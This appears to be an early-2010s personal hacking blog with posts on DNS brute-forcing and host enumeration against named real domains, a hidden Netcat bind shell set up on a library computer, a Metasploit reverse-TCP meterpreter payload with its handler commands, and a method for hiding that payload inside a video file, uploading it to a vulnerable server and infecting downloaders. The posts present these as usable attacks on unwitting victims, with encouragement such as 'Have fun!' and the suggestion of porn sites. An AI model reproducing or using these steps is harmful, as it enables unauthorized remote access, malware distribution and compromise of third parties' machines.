Monday, July 2, 2012

DNS Brute force

Using a list of common host names that I update when ever I find a new one through a zone transfer. I make a script to do host name.domain.com
Here is my Hostname list.

www
www2
mail
smtp
pop3
mailgw
proxy
vpn
ssl
imap
ns1
ns2
router
cisco
conf
exchange
isa
juniper
gopher
irc




Next I wrote the script to query the file for certain domains.

#!/bin/bash
for name in $(cat names.txt);do
host $name.docstar.com | grep "has address"
done

The output will give you the list of resolved names

docstar.com has address 50.57.86.180
www2.docstar.com has address 67.215.65.132
mail.docstar.com has address 206.17.147.38
smtp.docstar.com has address 67.215.65.132
pop3.docstar.com has address 67.215.65.132
mailgw.docstar.com has address 67.215.65.132
proxy.docstar.com has address 67.215.65.132
vpn.docstar.com has address 67.215.65.132
ssl.docstar.com has address 67.215.65.132
imap.docstar.com has address 67.215.65.132
ns1.docstar.com has address 67.215.65.132
ns2.docstar.com has address 67.215.65.132
router.docstar.com has address 67.215.65.132
cisco.docstar.com has address 67.215.65.132
conf.docstar.com has address 67.215.65.132
exchange.docstar.com has address 67.215.65.132
isa.docstar.com has address 67.215.65.132
juniper.docstar.com has address 67.215.65.132
gopher.docstar.com has address 67.215.65.132
irc.docstar.com has address 67.215.65.132

Just to clean it up I will throw cut in the script using a delimiter  of a space and use field 4

|cut -d " " -f4

Next I'll output it to a file

 >>docstarip.txt

cat docstarip.txt | sort -u

206.17.147.38
50.57.86.180
67.215.65.132


Friday, June 29, 2012

IP Enumeration

Now to find the IP addresses of the yahoo hosts we piped into yahoohost.txt
I'm going to make a quick bash script to retrieve the IP addresses.

[root@localhost yahoo]# nano yahooip.sh
#!/bin/bash
for hostname in $(cat yahoohost.txt); do
host $hostname
done
[root@localhost yahoo]# chmod 775 yahooip.sh

Now after doing this that output isn't that pretty to say the least I'll get aliases
"www.yahoo.com is an alias for fd-fp3.wg1.b.yahoo.com."
and other garbage so lets clean up the script a little bit.

#!/bin/bash
for hostname in $(cat yahoohost.txt); do
host $hostname | grep " has address"
done

It is better
"any-ycpi-uno.aycpi.b.yahoodns.net has address 98.136.145.152"
to clean this up we can use cut using space as a delimiter and use the 4th field.

Now we get a list of IP's many duplicates for some reason when I put | sort -u in the the script it does not work. If anyone knows how to do this let me know.

So I just pipe the IP's into yahooip.txt

[root@localhost yahoo]# ./yahooip.sh >yahooip.txt

Then cat it out using | sort -u

[root@localhost yahoo]# cat yahooip.txt | sort -u
216.115.101.178
216.115.101.179
74.6.117.48
74.6.238.254
76.13.115.116
98.136.145.152
98.136.145.153
98.136.145.154
98.136.145.155
98.136.145.156
98.136.145.157
98.136.70.45
98.136.78.47
98.137.220.33
98.139.138.100
98.139.169.19
98.139.183.24
98.139.235.15
98.139.241.94
98.139.52.59


That is it we have enumerated IP's for the hostnames we got.

Thursday, June 28, 2012

Bash Text Manipulation

I've been trying to get into programing so I've decided to start with some scripting to automate some Enumeration. I originally started with Bash Text Manipulation here is an example I did using yahoo, to enumerate hosts.

[root@localhost yahoo]# wget yahoo.com
--15:37:08--  http://yahoo.com/
           => `index.html'
Resolving yahoo.com... 98.139.183.24, 72.30.38.140, 209.191.122.70
Connecting to yahoo.com|98.139.183.24|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.yahoo.com/ [following]
--15:37:09--  http://www.yahoo.com/
           => `index.html'
Resolving www.yahoo.com... 98.139.183.24, 2001:4998:f00b:1fe::3001, 2001:4998:f00b:1fe::3000
Connecting to www.yahoo.com|98.139.183.24|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [       <=>                                ] 225,798      177.62K/s

15:37:10 (177.13 KB/s) - `index.html' saved [225798]

[root@localhost yahoo]# cat index.html | grep href | cut -d "/" -f3 | grep yahoo.com | cut -d '"' -f1 | sort -u
apps.search.yahoo.com
autos.yahoo.com
everything.yahoo.com
finance.yahoo.com
images.search.yahoo.com
info.yahoo.com
local.search.yahoo.com
login.yahoo.com
movies.yahoo.com
music.yahoo.com
news.yahoo.com
omg.yahoo.com
screen.yahoo.com
search.yahoo.com
shine.yahoo.com
shopping.yahoo.com
sports.yahoo.com
tools.search.yahoo.com
tv.yahoo.com
video.search.yahoo.com
weather.yahoo.com
www.yahoo.com

So just to explain what I did here; I'm going to take a link out of the index.html and break it down.
a href="http://weather.yahoo.com/redirwoei/12760452"
So I'm out putting anything that contains href in index.html as shown above.
Next I'm cutting using a delimiter of / and I only want the information from field 3.
The 1st field would be” a href="http:/"
The 2nd field would be "/"
The 3rd field would be weather.yahoo.com/"
Next I'm telling it only to output yahoo.com domain since there were links to imgur and etc.
Now this is pretty good but I do get some stragglers such as
www.yahoo.com">
www.yahoo.com">
So now I will cut using a delimiter of a " since it is a quote I need to surround it by single quotes and I want field 1.
Finally I will sort it by unique and pipe it to a file >yahoohost.txt

Friday, July 8, 2011

Bind shell using Netcat

So I did this while I was at a library, since you do not need admin rights and for I didn’t need to sit at the computer. I set up a netcat listener on port 4444 for I could connect to the computer from anywhere in the building. First I got a vb script straight from MS in order for you do not see the listener running. Create a process hidden in windows I used the script I found here.

Next I downloaded netcat for windows and created a bat script to run the command I wanted.
C:\Users\Syrus\Documents\nc\nc.exe -lvp 4444 -e cmd.exe
Next I edited the vbs script to include the batch file I made
Const HIDDEN_WINDOW = 12

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")

Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:\ Users\Syrus\Documents\test.bat", null, objConfig, intProcessID)

So this pipes cmd.exe to a listener on port 4444, all I need to do is find the ip of the victim and use netcat to connect. I did this by running.
$ nc -vn 10.10.9.171 4444
Connection to 10.10.9.171 4444 port [tcp/*] succeeded!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Now I have access to the computer from pretty much anywhere in building. Have fun!

Monday, June 27, 2011

Google Enumeration

This summary is not available. Please click here to view the post.

Thursday, June 23, 2011

Combining Files

I’m going to combine my two previous posts here and here,now for this exploit in combining files. Say you find a site vulnerable against PUT * HTTP/1.0 that has downloadable content. So I would recommend downloading a file off the server in this case for me it will be 03.mpg. I’m going to combine 03.mpg with my Metasploit Binary Payload meterpreter.exe.
We can use Windows command prompt in order to do this.
C:\ >copy /B 03.mpg + meterpreter.exe file.mpg
03.mpg
meterpreter.exe
1 file(s) copied.
The copy /B make the output a binary file. So now you can take file.mpg rename it to 03.mpg and PUT it back on the server, whenever someone downloads the file and runs it, it will spawn a meterpreter session to you. Say you do this on a porn site you can get multiple meterpreter sessions for easy exploiting.

Enjoy!

Wednesday, June 22, 2011

Metasploit Binary Payload

Once again we are going to start off simple. We are going to use Metasploit to make a Binary Payload using a reverse tcp meterpreter session. First we are going to export Metasploit meterpreter to a file. We do this via the following command. The LHOST will be your computer’s IP address for the victim knows where to connect back to. We are going to redirect the output of the command to a file named meterpreter.exe in the root of my http server for simplicity.

[root@localhost app]# ./msfpayload windows/meterpreter/reverse_tcp LHOST= x.x.70.197 X >/var/www/html/meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"10.10.13.247"}
Next we are going to give the file rw permission
[root@localhost app]# chmod 665 /var/www/html/meterpreter.exe
Now on the attacking box we need to set up a meterpreter listener.
[root@localhost app]# ./msfconsole
=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 37 days ago (2011.05.16)

Warning: This copy of the Metasploit Framework was last updated 37 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.70.197
LHOST => x.x.70.197
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.70.197:4444
[*] Starting the payload handler...

Next run the executable on the victims computer (I’ll show a better way to do this later down the road).

[*]Transmitting intermediate stager for over-sized stage…(89 bytes)
[*]Sending stage (2834 bytes)
[*]Sleeping before handling stage…
[*]Uploading DLL (81931 bytes)…
[*]Upload completed.
[*]Meterpreter session 1 opened (x.x.70.197:4444 -> x.x.200.252:1227
meterpreter >

This has a lot of possibilities if you want to compromise a server you can find one that was vulnerable to my last post. Put in a file that gives you command line access to the server and run the executable on the server itself. This way, get a privileged session to the entire server as opposed to a directory if it is jailed.